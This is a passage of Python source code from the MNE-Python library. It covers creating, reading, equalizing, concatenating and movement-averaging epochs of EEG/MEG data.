dict is created with string integer names corresponding
to the event id integers.
%(reject_epochs)s
%(flat)s
reject_tmin : scalar | None
Start of the time window used to reject epochs (with the default None,
the window will start with tmin).
reject_tmax : scalar | None
End of the time window used to reject epochs (with the default None,
the window will end with tmax).
%(baseline_epochs)s
Defaults to ``None``, i.e. no baseline correction.
proj : bool | 'delayed'
Apply SSP projection vectors. See :class:`mne.Epochs` for details.
on_missing : str
See :class:`mne.Epochs` docstring for details.
metadata : instance of pandas.DataFrame | None
See :class:`mne.Epochs` docstring for details.
.. versionadded:: 0.16
selection : ndarray | None
The selection compared to the original set of epochs.
Can be None to use ``np.arange(len(events))``.
.. versionadded:: 0.16
%(verbose)s
See Also
--------
create_info
EvokedArray
io.RawArray
Notes
-----
Proper units of measure:
* V: eeg, eog, seeg, dbs, emg, ecg, bio, ecog
* T: mag
* T/m: grad
* M: hbo, hbr
* Am: dipole
* AU: misc
EpochsArray does not set `Annotations`. If you would like to create
simulated data with Annotations that are then preserved in the Epochs
object, you would use `mne.io.RawArray` first and then create an
`mne.Epochs` object.
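Examples
--------
A minimal, self-contained sketch using simulated data (channel names,
sampling rate, and array shape are illustrative only):
>>> import numpy as np  # doctest: +SKIP
>>> import mne  # doctest: +SKIP
>>> info = mne.create_info(['EEG 001', 'EEG 002'], sfreq=100., ch_types='eeg')  # doctest: +SKIP
>>> data = np.random.randn(5, 2, 100) * 1e-6  # doctest: +SKIP
>>> epochs = mne.EpochsArray(data, info, tmin=-0.5)  # doctest: +SKIP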
"""
@verbose
def __init__(self, data, info, events=None, tmin=0, event_id=None,
reject=None, flat=None, reject_tmin=None,
reject_tmax=None, baseline=None, proj=True,
on_missing='raise', metadata=None, selection=None,
verbose=None): # noqa: D102
dtype = np.complex128 if np.any(np.iscomplex(data)) else np.float64
data = np.asanyarray(data, dtype=dtype)
if data.ndim != 3:
raise ValueError('Data must be a 3D array of shape (n_epochs, '
'n_channels, n_samples)')
if len(info['ch_names']) != data.shape[1]:
raise ValueError('Info and data must have same number of '
'channels.')
if events is None:
n_epochs = len(data)
events = _gen_events(n_epochs)
info = info.copy() # do not modify original info
tmax = (data.shape[2] - 1) / info['sfreq'] + tmin
super(EpochsArray, self).__init__(
info, data, events, event_id, tmin, tmax, baseline,
reject=reject, flat=flat, reject_tmin=reject_tmin,
reject_tmax=reject_tmax, decim=1, metadata=metadata,
selection=selection, proj=proj, on_missing=on_missing,
verbose=verbose)
if self.baseline is not None:
self._do_baseline = True
if len(events) != np.in1d(self.events[:, 2],
list(self.event_id.values())).sum():
raise ValueError('The events must only contain event numbers from '
'event_id')
detrend_picks = self._detrend_picks
for e in self._data:
# This is safe without assignment b/c there is no decim
self._detrend_offset_decim(e, detrend_picks)
self.drop_bad()
def combine_event_ids(epochs, old_event_ids, new_event_id, copy=True):
"""Collapse event_ids from an epochs instance into a new event_id.
Parameters
----------
epochs : instance of Epochs
The epochs to operate on.
old_event_ids : str, or list
Conditions to collapse together.
new_event_id : dict, or int
A one-element dict (or a single integer) for the new
condition. Note that for safety, this cannot be any
existing id (in epochs.event_id.values()).
copy : bool
Whether to return a new instance or modify in place.
Returns
-------
epochs : instance of Epochs
The modified epochs.
Notes
-----
For example (if ``epochs.event_id`` was ``{'Left': 1, 'Right': 2}``)::
combine_event_ids(epochs, ['Left', 'Right'], {'Directional': 12})
would create a 'Directional' entry in epochs.event_id replacing
'Left' and 'Right' (combining their trials).
"""
epochs = epochs.copy() if copy else epochs
old_event_ids = np.asanyarray(old_event_ids)
if isinstance(new_event_id, int):
new_event_id = {str(new_event_id): new_event_id}
else:
if not isinstance(new_event_id, dict):
raise ValueError('new_event_id must be a dict or int')
if not len(list(new_event_id.keys())) == 1:
raise ValueError('new_event_id dict must have one entry')
new_event_num = list(new_event_id.values())[0]
new_event_num = operator.index(new_event_num)
if new_event_num in epochs.event_id.values():
raise ValueError('new_event_id value must not already exist')
# could use .pop() here, but if a later one doesn't exist, we're
# in trouble, so run them all here and pop() later
old_event_nums = np.array([epochs.event_id[key] for key in old_event_ids])
# find the ones to replace
inds = np.any(epochs.events[:, 2][:, np.newaxis] ==
old_event_nums[np.newaxis, :], axis=1)
# replace the event numbers in the events list
epochs.events[inds, 2] = new_event_num
# delete old entries
for key in old_event_ids:
epochs.event_id.pop(key)
# add the new entry
epochs.event_id.update(new_event_id)
return epochs
def equalize_epoch_counts(epochs_list, method='mintime'):
"""Equalize the number of trials in multiple Epoch instances.
Parameters
----------
epochs_list : list of Epochs instances
The Epochs instances to equalize trial counts for.
method : str
If 'truncate', events will be truncated from the end of each event
list. If 'mintime', timing differences between each event list will be
minimized.
Notes
-----
This tries to make the remaining epochs occur as close as possible in
time. This method works based on the idea that if there happened to be some
time-varying (like on the scale of minutes) noise characteristics during
a recording, they could be compensated for (to some extent) in the
equalization process. This method thus seeks to reduce any of those effects
by minimizing the differences in the times of the events in the two sets of
epochs. For example, if one had event times [1, 2, 3, 4, 120, 121] and the
other one had [3.5, 4.5, 120.5, 121.5], it would remove events at times
[1, 2] in the first epochs and not [120, 121].
Examples
--------
>>> equalize_epoch_counts([epochs1, epochs2]) # doctest: +SKIP
"""
if not all(isinstance(e, BaseEpochs) for e in epochs_list):
raise ValueError('All inputs must be Epochs instances')
# make sure bad epochs are dropped
for e in epochs_list:
if not e._bad_dropped:
e.drop_bad()
event_times = [e.events[:, 0] for e in epochs_list]
indices = _get_drop_indices(event_times, method)
for e, inds in zip(epochs_list, indices):
e.drop(inds, reason='EQUALIZED_COUNT')
def _get_drop_indices(event_times, method):
"""Get indices to drop from multiple event timing lists."""
small_idx = np.argmin([e.shape[0] for e in event_times])
small_e_times = event_times[small_idx]
_check_option('method', method, ['mintime', 'truncate'])
indices = list()
for e in event_times:
if method == 'mintime':
mask = _minimize_time_diff(small_e_times, e)
else:
mask = np.ones(e.shape[0], dtype=bool)
mask[small_e_times.shape[0]:] = False
indices.append(np.where(np.logical_not(mask))[0])
return indices
def _minimize_time_diff(t_shorter, t_longer):
"""Find a boolean mask to minimize timing differences."""
from scipy.interpolate import interp1d
keep = np.ones((len(t_longer)), dtype=bool)
# special case: length zero or one
if len(t_shorter) < 2: # interp1d won't work
keep.fill(False)
if len(t_shorter) == 1:
idx = np.argmin(np.abs(t_longer - t_shorter))
keep[idx] = True
return keep
scores = np.ones((len(t_longer)))
x1 = np.arange(len(t_shorter))
# The first set of keep masks to test
kwargs = dict(copy=False, bounds_error=False, assume_sorted=True)
shorter_interp = interp1d(x1, t_shorter, fill_value=t_shorter[-1],
**kwargs)
for ii in range(len(t_longer) - len(t_shorter)):
scores.fill(np.inf)
# set up the keep masks to test, eliminating any rows that are already
# gone
keep_mask = ~np.eye(len(t_longer), dtype=bool)[keep]
keep_mask[:, ~keep] = False
# Check every possible removal to see if it minimizes
x2 = np.arange(len(t_longer) - ii - 1)
t_keeps = np.array([t_longer[km] for km in keep_mask])
longer_interp = interp1d(x2, t_keeps, axis=1,
fill_value=t_keeps[:, -1],
**kwargs)
d1 = longer_interp(x1) - t_shorter
d2 = shorter_interp(x2) - t_keeps
scores[keep] = np.abs(d1, d1).sum(axis=1) + np.abs(d2, d2).sum(axis=1)
keep[np.argmin(scores)] = False
return keep
@verbose
def _is_good(e, ch_names, channel_type_idx, reject, flat, full_report=False,
ignore_chs=[], verbose=None):
"""Test if data segment e is good according to reject and flat.
If full_report=True, it will give True/False as well as a list of all
offending channels.
"""
bad_tuple = tuple()
has_printed = False
checkable = np.ones(len(ch_names), dtype=bool)
checkable[np.array([c in ignore_chs
for c in ch_names], dtype=bool)] = False
for refl, f, t in zip([reject, flat], [np.greater, np.less], ['', 'flat']):
if refl is not None:
for key, thresh in refl.items():
idx = channel_type_idx[key]
name = key.upper()
if len(idx) > 0:
e_idx = e[idx]
deltas = np.max(e_idx, axis=1) - np.min(e_idx, axis=1)
checkable_idx = checkable[idx]
idx_deltas = np.where(np.logical_and(f(deltas, thresh),
checkable_idx))[0]
if len(idx_deltas) > 0:
bad_names = [ch_names[idx[i]] for i in idx_deltas]
if (not has_printed):
logger.info(' Rejecting %s epoch based on %s : '
'%s' % (t, name, bad_names))
has_printed = True
if not full_report:
return False
else:
bad_tuple += tuple(bad_names)
if not full_report:
return True
else:
if bad_tuple == ():
return True, None
else:
return False, bad_tuple
def _read_one_epoch_file(f, tree, preload):
"""Read a single FIF file."""
with f as fid:
# Read the measurement info
info, meas = read_meas_info(fid, tree, clean_bads=True)
# read in the Annotations if they exist
annotations = _read_annotations_fif(fid, tree)
events, mappings = _read_events_fif(fid, tree)
# Metadata
metadata = None
metadata_tree = dir_tree_find(tree, FIFF.FIFFB_MNE_METADATA)
if len(metadata_tree) > 0:
for dd in metadata_tree[0]['directory']:
kind = dd.kind
pos = dd.pos
if kind == FIFF.FIFF_DESCRIPTION:
metadata = read_tag(fid, pos).data
metadata = _prepare_read_metadata(metadata)
break
# Locate the data of interest
processed = dir_tree_find(meas, FIFF.FIFFB_PROCESSED_DATA)
del meas
if len(processed) == 0:
raise ValueError('Could not find processed data')
epochs_node = dir_tree_find(tree, FIFF.FIFFB_MNE_EPOCHS)
if len(epochs_node) == 0:
# before version 0.11 we errantly saved with this tag instead of
# an MNE tag
epochs_node = dir_tree_find(tree, FIFF.FIFFB_MNE_EPOCHS)
if len(epochs_node) == 0:
epochs_node = dir_tree_find(tree, 122) # 122 used before v0.11
if len(epochs_node) == 0:
raise ValueError('Could not find epochs data')
my_epochs = epochs_node[0]
# Now find the data in the block
data = None
data_tag = None
bmin, bmax = None, None
baseline = None
selection = None
drop_log = None
raw_sfreq = None
reject_params = {}
for k in range(my_epochs['nent']):
kind = my_epochs['directory'][k].kind
pos = my_epochs['directory'][k].pos
if kind == FIFF.FIFF_FIRST_SAMPLE:
tag = read_tag(fid, pos)
first = int(tag.data)
elif kind == FIFF.FIFF_LAST_SAMPLE:
tag = read_tag(fid, pos)
last = int(tag.data)
elif kind == FIFF.FIFF_EPOCH:
# delay reading until later
fid.seek(pos, 0)
data_tag = read_tag_info(fid)
data_tag.pos = pos
data_tag.type = data_tag.type ^ (1 << 30)
elif kind in [FIFF.FIFF_MNE_BASELINE_MIN, 304]:
# Constant 304 was used before v0.11
tag = read_tag(fid, pos)
bmin = float(tag.data)
elif kind in [FIFF.FIFF_MNE_BASELINE_MAX, 305]:
# Constant 305 was used before v0.11
tag = read_tag(fid, pos)
bmax = float(tag.data)
elif kind == FIFF.FIFF_MNE_EPOCHS_SELECTION:
tag = read_tag(fid, pos)
selection = np.array(tag.data)
elif kind == FIFF.FIFF_MNE_EPOCHS_DROP_LOG:
tag = read_tag(fid, pos)
drop_log = tag.data
drop_log = json.loads(drop_log)
drop_log = tuple(tuple(x) for x in drop_log)
elif kind == FIFF.FIFF_MNE_EPOCHS_REJECT_FLAT:
tag = read_tag(fid, pos)
reject_params = json.loads(tag.data)
elif kind == FIFF.FIFF_MNE_EPOCHS_RAW_SFREQ:
tag = read_tag(fid, pos)
raw_sfreq = tag.data
if bmin is not None or bmax is not None:
baseline = (bmin, bmax)
n_samp = last - first + 1
logger.info(' Found the data of interest:')
logger.info(' t = %10.2f ... %10.2f ms'
% (1000 * first / info['sfreq'],
1000 * last / info['sfreq']))
if info['comps'] is not None:
logger.info(' %d CTF compensation matrices available'
% len(info['comps']))
# Inspect the data
if data_tag is None:
raise ValueError('Epochs data not found')
epoch_shape = (len(info['ch_names']), n_samp)
size_expected = len(events) * np.prod(epoch_shape)
# on read double-precision is always used
if data_tag.type == FIFF.FIFFT_FLOAT:
datatype = np.float64
fmt = '>f4'
elif data_tag.type == FIFF.FIFFT_DOUBLE:
datatype = np.float64
fmt = '>f8'
elif data_tag.type == FIFF.FIFFT_COMPLEX_FLOAT:
datatype = np.complex128
fmt = '>c8'
elif data_tag.type == FIFF.FIFFT_COMPLEX_DOUBLE:
datatype = np.complex128
fmt = '>c16'
fmt_itemsize = np.dtype(fmt).itemsize
assert fmt_itemsize in (4, 8, 16)
size_actual = data_tag.size // fmt_itemsize - 16 // fmt_itemsize
if not size_actual == size_expected:
raise ValueError('Incorrect number of samples (%d instead of %d)'
% (size_actual, size_expected))
# Calibration factors
cals = np.array([[info['chs'][k]['cal'] *
info['chs'][k].get('scale', 1.0)]
for k in range(info['nchan'])], np.float64)
# Read the data
if preload:
data = read_tag(fid, data_tag.pos).data.astype(datatype)
data *= cals
# Put it all together
tmin = first / info['sfreq']
tmax = last / info['sfreq']
event_id = ({str(e): e for e in np.unique(events[:, 2])}
if mappings is None else mappings)
# In case epochs didn't have a FIFF.FIFF_MNE_EPOCHS_SELECTION tag
# (version < 0.8):
if selection is None:
selection = np.arange(len(events))
if drop_log is None:
drop_log = ((),) * len(events)
return (info, data, data_tag, events, event_id, metadata, tmin, tmax,
baseline, selection, drop_log, epoch_shape, cals, reject_params,
fmt, annotations, raw_sfreq)
@verbose
def read_epochs(fname, proj=True, preload=True, verbose=None):
"""Read epochs from a fif file.
Parameters
----------
%(epochs_fname)s
%(proj_epochs)s
preload : bool
If True, read all epochs from disk immediately. If ``False``, epochs
will be read on demand.
%(verbose)s
Returns
-------
epochs : instance of Epochs
The epochs.
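Examples
--------
A minimal sketch; the file name is illustrative only:
>>> epochs = read_epochs('sample-epo.fif', preload=False)  # doctest: +SKIP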
"""
return EpochsFIF(fname, proj, preload, verbose)
class _RawContainer(object):
"""Helper for a raw data container."""
def __init__(self, fid, data_tag, event_samps, epoch_shape,
cals, fmt): # noqa: D102
self.fid = fid
self.data_tag = data_tag
self.event_samps = event_samps
self.epoch_shape = epoch_shape
self.cals = cals
self.proj = False
self.fmt = fmt
def __del__(self): # noqa: D105
self.fid.close()
@fill_doc
class EpochsFIF(BaseEpochs):
"""Epochs read from disk.
Parameters
----------
%(epochs_fname)s
%(proj_epochs)s
preload : bool
If True, read all epochs from disk immediately. If False, epochs will
be read on demand.
%(verbose)s
See Also
--------
mne.Epochs
mne.epochs.combine_event_ids
mne.Epochs.equalize_event_counts
"""
@verbose
def __init__(self, fname, proj=True, preload=True,
verbose=None): # noqa: D102
if _path_like(fname):
check_fname(
fname=fname, filetype='epochs',
endings=('-epo.fif', '-epo.fif.gz', '_epo.fif', '_epo.fif.gz')
)
fname = _check_fname(fname=fname, must_exist=True,
overwrite='read')
elif not preload:
raise ValueError('preload must be used with file-like objects')
fnames = [fname]
ep_list = list()
raw = list()
for fname in fnames:
fname_rep = _get_fname_rep(fname)
logger.info('Reading %s ...' % fname_rep)
fid, tree, _ = fiff_open(fname, preload=preload)
next_fname = _get_next_fname(fid, fname, tree)
(info, data, data_tag, events, event_id, metadata, tmin, tmax,
baseline, selection, drop_log, epoch_shape, cals,
reject_params, fmt, annotations, raw_sfreq) = \
_read_one_epoch_file(fid, tree, preload)
if (events[:, 0] < 0).any():
events = events.copy()
warn('Incorrect events detected on disk, setting event '
'numbers to consecutive increasing integers')
events[:, 0] = np.arange(1, len(events) + 1)
# here we ignore missing events, since users should already be
# aware of missing events if they have saved data that way
# we also retain original baseline without re-applying baseline
# correction (data is being baseline-corrected when written to
# disk)
epoch = BaseEpochs(
info, data, events, event_id, tmin, tmax,
baseline=None,
metadata=metadata, on_missing='ignore',
selection=selection, drop_log=drop_log,
proj=False, verbose=False, raw_sfreq=raw_sfreq)
epoch.baseline = baseline
epoch._do_baseline = False # might be superfluous but won't hurt
ep_list.append(epoch)
if not preload:
# store everything we need to index back to the original data
raw.append(_RawContainer(fiff_open(fname)[0], data_tag,
events[:, 0].copy(), epoch_shape,
cals, fmt))
if next_fname is not None:
fnames.append(next_fname)
unsafe_annot_add = raw_sfreq is None
(info, data, raw_sfreq, events, event_id, tmin, tmax, metadata,
baseline, selection, drop_log) = \
_concatenate_epochs(ep_list, with_data=preload, add_offset=False)
# we need this uniqueness for non-preloaded data to work properly
if len(np.unique(events[:, 0])) != len(events):
raise RuntimeError('Event time samples were not unique')
# correct the drop log
assert len(drop_log) % len(fnames) == 0
step = len(drop_log) // len(fnames)
offsets = np.arange(step, len(drop_log) + 1, step)
drop_log = list(drop_log)
for i1, i2 in zip(offsets[:-1], offsets[1:]):
other_log = drop_log[i1:i2]
for k, (a, b) in enumerate(zip(drop_log, other_log)):
if a == ('IGNORED',) and b != ('IGNORED',):
drop_log[k] = b
drop_log = tuple(drop_log[:step])
# call BaseEpochs constructor
# again, ensure we're retaining the baseline period originally loaded
# from disk without trying to re-apply baseline correction
super(EpochsFIF, self).__init__(
info, data, events, event_id, tmin, tmax,
baseline=None, raw=raw,
proj=proj, preload_at_end=False, on_missing='ignore',
selection=selection, drop_log=drop_log, filename=fname_rep,
metadata=metadata, verbose=verbose, raw_sfreq=raw_sfreq,
annotations=annotations, **reject_params)
self.baseline = baseline
self._do_baseline = False
# use the private property instead of drop_bad so that epochs
# are not all read from disk for preload=False
self._bad_dropped = True
# private property to suggest that people re-save epochs if they add
# annotations
self._unsafe_annot_add = unsafe_annot_add
@verbose
def _get_epoch_from_raw(self, idx, verbose=None):
"""Load one epoch from disk."""
# Find the right file and offset to use
event_samp = self.events[idx, 0]
for raw in self._raw:
idx = np.where(raw.event_samps == event_samp)[0]
if len(idx) == 1:
fmt = raw.fmt
idx = idx[0]
size = np.prod(raw.epoch_shape) * np.dtype(fmt).itemsize
offset = idx * size + 16 # 16 = Tag header
break
else:
# read the correct subset of the data
raise RuntimeError('Correct epoch could not be found, please '
'contact mne-python developers')
# the following is equivalent to this, but faster:
#
# >>> data = read_tag(raw.fid, raw.data_tag.pos).data.astype(float)
# >>> data *= raw.cals[np.newaxis, :, :]
# >>> data = data[idx]
#
# Eventually this could be refactored in io/tag.py if other functions
# could make use of it
raw.fid.seek(raw.data_tag.pos + offset, 0)
if fmt == '>c8':
read_fmt = '>f4'
elif fmt == '>c16':
read_fmt = '>f8'
else:
read_fmt = fmt
data = np.frombuffer(raw.fid.read(size), read_fmt)
if read_fmt != fmt:
data = data.view(fmt)
data = data.astype(np.complex128)
else:
data = data.astype(np.float64)
data.shape = raw.epoch_shape
data *= raw.cals
return data
@fill_doc
def bootstrap(epochs, random_state=None):
"""Compute epochs selected by bootstrapping.
Parameters
----------
epochs : Epochs instance
epochs data to be bootstrapped
%(random_state)s
Returns
-------
epochs : Epochs instance
The bootstrap samples
"""
if not epochs.preload:
raise RuntimeError('Modifying data of epochs is only supported '
'when preloading is used. Use preload=True '
'in the constructor.')
rng = check_random_state(random_state)
epochs_bootstrap = epochs.copy()
n_events = len(epochs_bootstrap.events)
idx = rng_uniform(rng)(0, n_events, n_events)
epochs_bootstrap = epochs_bootstrap[idx]
return epochs_bootstrap
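# Usage sketch (assumes ``epochs`` is a preloaded Epochs instance): draw a
# bootstrap resample of the same size, seeded for reproducibility.
#
#     epochs_boot = bootstrap(epochs, random_state=42)
#     assert len(epochs_boot) == len(epochs)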
def _check_merge_epochs(epochs_list):
"""Aux function."""
if len({tuple(epochs.event_id.items()) for epochs in epochs_list}) != 1:
raise NotImplementedError("Epochs with unequal values for event_id")
if len({epochs.tmin for epochs in epochs_list}) != 1:
raise NotImplementedError("Epochs with unequal values for tmin")
if len({epochs.tmax for epochs in epochs_list}) != 1:
raise NotImplementedError("Epochs with unequal values for tmax")
if len({epochs.baseline for epochs in epochs_list}) != 1:
raise NotImplementedError("Epochs with unequal values for baseline")
@verbose
def add_channels_epochs(epochs_list, verbose=None):
"""Concatenate channels, info and data from two Epochs objects.
Parameters
----------
epochs_list : list of Epochs
Epochs object to concatenate.
%(verbose)s Defaults to True if any of the input epochs have verbose=True.
Returns
-------
epochs : instance of Epochs
Concatenated epochs.
"""
if not all(e.preload for e in epochs_list):
raise ValueError('All epochs must be preloaded.')
info = _merge_info([epochs.info for epochs in epochs_list])
data = [epochs._data for epochs in epochs_list]
_check_merge_epochs(epochs_list)
for d in data:
if len(d) != len(data[0]):
raise ValueError('all epochs must be of the same length')
data = np.concatenate(data, axis=1)
if len(info['chs']) != data.shape[1]:
err = "Data shape does not match channel number in measurement info"
raise RuntimeError(err)
events = epochs_list[0].events.copy()
all_same = all(np.array_equal(events, epochs.events)
for epochs in epochs_list[1:])
if not all_same:
raise ValueError('Events must be the same.')
proj = any(e.proj for e in epochs_list)
epochs = epochs_list[0].copy()
epochs.info = info
epochs.picks = None
epochs.events = events
epochs.preload = True
epochs._bad_dropped = True
epochs._data = data
epochs._projector, epochs.info = setup_proj(epochs.info, False,
activate=proj)
return epochs
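# Usage sketch (assumes ``epochs_meg`` and ``epochs_eeg`` are preloaded Epochs
# objects with identical events and times but disjoint channel sets):
#
#     epochs_all = add_channels_epochs([epochs_meg, epochs_eeg])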
def _concatenate_epochs(epochs_list, with_data=True, add_offset=True, *,
on_mismatch='raise'):
"""Auxiliary function for concatenating epochs."""
if not isinstance(epochs_list, (list, tuple)):
raise TypeError('epochs_list must be a list or tuple, got %s'
% (type(epochs_list),))
# to make warning messages only occur once during concatenation
warned = False
for ei, epochs in enumerate(epochs_list):
if not isinstance(epochs, BaseEpochs):
raise TypeError('epochs_list[%d] must be an instance of Epochs, '
'got %s' % (ei, type(epochs)))
if (getattr(epochs, 'annotations', None) is not None and
len(epochs.annotations) > 0 and
not warned):
warned = True
warn('Concatenation of Annotations within Epochs is not supported '
'yet. All annotations will be dropped.')
# create a copy, so that the Annotations are not modified in place
# from the original object
epochs = epochs.copy()
epochs.set_annotations(None)
out = epochs_list[0]
offsets = [0]
if with_data:
out.drop_bad()
offsets.append(len(out))
events = [out.events]
metadata = [out.metadata]
baseline, tmin, tmax = out.baseline, out.tmin, out.tmax
raw_sfreq = out._raw_sfreq
info = deepcopy(out.info)
drop_log = out.drop_log
event_id = deepcopy(out.event_id)
selection = out.selection
    # offset is the last epoch + tmax + 10 seconds
shift = int((10 + tmax) * out.info['sfreq'])
events_offset = int(np.max(events[0][:, 0])) + shift
events_overflow = False
warned = False
for ii, epochs in enumerate(epochs_list[1:], 1):
_ensure_infos_match(epochs.info, info, f'epochs[{ii}]',
on_mismatch=on_mismatch)
if not np.allclose(epochs.times, epochs_list[0].times):
raise ValueError('Epochs must have same times')
if epochs.baseline != baseline:
raise ValueError('Baseline must be same for all epochs')
if epochs._raw_sfreq != raw_sfreq and not warned:
warned = True
warn('The original raw sampling rate of the Epochs does not '
'match for all Epochs. Please proceed cautiously.')
# compare event_id
common_keys = list(set(event_id).intersection(set(epochs.event_id)))
for key in common_keys:
if not event_id[key] == epochs.event_id[key]:
msg = ('event_id values must be the same for identical keys '
'for all concatenated epochs. Key "{}" maps to {} in '
'some epochs and to {} in others.')
raise ValueError(msg.format(key, event_id[key],
epochs.event_id[key]))
if with_data:
epochs.drop_bad()
offsets.append(len(epochs))
evs = epochs.events.copy()
if len(epochs.events) == 0:
warn('One of the Epochs objects to concatenate was empty.')
elif add_offset:
# We need to cast to a native Python int here to detect an
# overflow of a numpy int32 (which is the default on windows)
max_timestamp = int(np.max(evs[:, 0]))
evs[:, 0] += events_offset
events_offset += max_timestamp + shift
if events_offset > INT32_MAX:
warn(f'Event number greater than {INT32_MAX} created, '
'events[:, 0] will be assigned consecutive increasing '
'integer values')
events_overflow = True
add_offset = False # we no longer need to add offset
events.append(evs)
selection = np.concatenate((selection, epochs.selection))
drop_log = drop_log + epochs.drop_log
event_id.update(epochs.event_id)
metadata.append(epochs.metadata)
events = np.concatenate(events, axis=0)
# check to see if we exceeded our maximum event offset
if events_overflow:
events[:, 0] = np.arange(1, len(events) + 1)
# Create metadata object (or make it None)
n_have = sum(this_meta is not None for this_meta in metadata)
if n_have == 0:
metadata = None
elif n_have != len(metadata):
raise ValueError('%d of %d epochs instances have metadata, either '
'all or none must have metadata'
% (n_have, len(metadata)))
else:
pd = _check_pandas_installed(strict=False)
if pd is not False:
metadata = pd.concat(metadata)
else: # dict of dicts
metadata = sum(metadata, list())
assert len(offsets) == (len(epochs_list) if with_data else 0) + 1
data = None
if with_data:
offsets = np.cumsum(offsets)
for start, stop, epochs in zip(offsets[:-1], offsets[1:], epochs_list):
this_data = epochs.get_data()
if data is None:
data = np.empty(
(offsets[-1], len(out.ch_names), len(out.times)),
dtype=this_data.dtype)
data[start:stop] = this_data
return (info, data, raw_sfreq, events, event_id, tmin, tmax, metadata,
baseline, selection, drop_log)
def _finish_concat(info, data, raw_sfreq, events, event_id, tmin, tmax,
metadata, baseline, selection, drop_log):
"""Finish concatenation for epochs not read from disk."""
selection = np.where([len(d) == 0 for d in drop_log])[0]
out = BaseEpochs(
info, data, events, event_id, tmin, tmax, baseline=baseline,
selection=selection, drop_log=drop_log, proj=False,
on_missing='ignore', metadata=metadata, raw_sfreq=raw_sfreq)
out.drop_bad()
return out
@verbose
def concatenate_epochs(epochs_list, add_offset=True, *, on_mismatch='raise',
verbose=None):
"""Concatenate a list of `~mne.Epochs` into one `~mne.Epochs` object.
.. note:: Unlike `~mne.concatenate_raws`, this function does **not**
modify any of the input data.
Parameters
----------
epochs_list : list
List of `~mne.Epochs` instances to concatenate (in that order).
add_offset : bool
If True, a fixed offset is added to the event times from different
Epochs sets, such that they are easy to distinguish after the
concatenation.
If False, the event times are unaltered during the concatenation.
%(on_info_mismatch)s
%(verbose)s
.. versionadded:: 0.24
Returns
-------
epochs : instance of Epochs
The result of the concatenation.
Notes
-----
.. versionadded:: 0.9.0
"""
return _finish_concat(*_concatenate_epochs(epochs_list,
add_offset=add_offset,
on_mismatch=on_mismatch))
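# Usage sketch (assumes ``epochs1`` and ``epochs2`` share the same info, times
# and baseline, e.g. two runs of the same paradigm):
#
#     all_epochs = concatenate_epochs([epochs1, epochs2])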
@verbose
def average_movements(epochs, head_pos=None, orig_sfreq=None, picks=None,
origin='auto', weight_all=True, int_order=8, ext_order=3,
destination=None, ignore_ref=False, return_mapping=False,
mag_scale=100., verbose=None):
"""Average data using Maxwell filtering, transforming using head positions.
Parameters
----------
epochs : instance of Epochs
The epochs to operate on.
%(maxwell_pos)s
orig_sfreq : float | None
The original sample frequency of the data (that matches the
event sample numbers in ``epochs.events``). Can be ``None``
if data have not been decimated or resampled.
%(picks_all_data)s
%(maxwell_origin)s
weight_all : bool
If True, all channels are weighted by the SSS basis weights.
If False, only MEG channels are weighted, other channels
receive uniform weight per epoch.
%(maxwell_int)s
%(maxwell_ext)s
%(maxwell_dest)s
%(maxwell_ref)s
return_mapping : bool
If True, return the mapping matrix.
%(maxwell_mag)s
.. versionadded:: 0.13
%(verbose)s
Returns
-------
evoked : instance of Evoked
The averaged epochs.
See Also
--------
mne.preprocessing.maxwell_filter
mne.chpi.read_head_pos
Notes
-----
The Maxwell filtering version of this algorithm is described in [1]_,
in section V.B "Virtual signals and movement correction", equations
40-44. For additional validation, see [2]_.
Regularization has not been added because in testing it appears to
decrease dipole localization accuracy relative to using all components.
Fine calibration and cross-talk cancellation, however, could be added
to this algorithm based on user demand.
.. versionadded:: 0.11
References
----------
.. [1] Taulu S. and Kajola M. "Presentation of electromagnetic
multichannel data: The signal space separation method,"
Journal of Applied Physics, vol. 97, pp. 124905 1-10, 2005.
.. [2] Wehner DT, Hämäläinen MS, Mody M, Ahlfors SP. "Head movements
of children in MEG: Quantification, effects on source
           estimation, and compensation," NeuroImage 40:541–550, 2008.
""" # noqa: E501
from .preprocessing.maxwell import (_trans_sss_basis, _reset_meg_bads,
_check_usable, _col_norm_pinv,
_get_n_moments, _get_mf_picks_fix_mags,
_prep_mf_coils, _check_destination,
_remove_meg_projs, _get_coil_scale)
if head_pos is None:
raise TypeError('head_pos must be provided and cannot be None')
from .chpi import head_pos_to_trans_rot_t
if not isinstance(epochs, BaseEpochs):
raise TypeError('epochs must be an instance of Epochs, not %s'
% (type(epochs),))
orig_sfreq = epochs.info['sfreq'] if orig_sfreq is None else orig_sfreq
orig_sfreq = float(orig_sfreq)
if isinstance(head_pos, np.ndarray):
head_pos = head_pos_to_trans_rot_t(head_pos)
trn, rot, t = head_pos
del head_pos
_check_usable(epochs)
origin = _check_origin(origin, epochs.info, 'head')
recon_trans = _check_destination(destination, epochs.info, True)
logger.info('Aligning and averaging up to %s epochs'
% (len(epochs.events)))
if not np.array_equal(epochs.events[:, 0], np.unique(epochs.events[:, 0])):
raise RuntimeError('Epochs must have monotonically increasing events')
info_to = epochs.info.copy()
meg_picks, mag_picks, grad_picks, good_mask, _ = \
_get_mf_picks_fix_mags(info_to, int_order, ext_order, ignore_ref)
coil_scale, mag_scale = _get_coil_scale(
meg_picks, mag_picks, grad_picks, mag_scale, info_to)
n_channels, n_times = len(epochs.ch_names), len(epochs.times)
other_picks = np.setdiff1d(np.arange(n_channels), meg_picks)
data = np.zeros((n_channels, n_times))
count = 0
# keep only MEG w/bad channels marked in "info_from"
info_from = pick_info(info_to, meg_picks[good_mask], copy=True)
all_coils_recon = _prep_mf_coils(info_to, ignore_ref=ignore_ref)
all_coils = _prep_mf_coils(info_from, ignore_ref=ignore_ref)
# remove MEG bads in "to" info
_reset_meg_bads(info_to)
# set up variables
w_sum = 0.
n_in, n_out = _get_n_moments([int_order, ext_order])
S_decomp = 0. # this will end up being a weighted average
last_trans = None
decomp_coil_scale = coil_scale[good_mask]
exp = dict(int_order=int_order, ext_order=ext_order, head_frame=True,
origin=origin)
n_in = _get_n_moments(int_order)
for ei, epoch in enumerate(epochs):
event_time = epochs.events[epochs._current - 1, 0] / orig_sfreq
use_idx = np.where(t <= event_time)[0]
if len(use_idx) == 0:
trans = info_to['dev_head_t']['trans']
else:
use_idx = use_idx[-1]
trans = np.vstack([np.hstack([rot[use_idx], trn[[use_idx]].T]),
[[0., 0., 0., 1.]]])
loc_str = ', '.join('%0.1f' % tr for tr in (trans[:3, 3] * 1000))
if last_trans is None or not np.allclose(last_trans, trans):
logger.info(' Processing epoch %s (device location: %s mm)'
% (ei + 1, loc_str))
reuse = False
last_trans = trans
else:
logger.info(' Processing epoch %s (device location: same)'
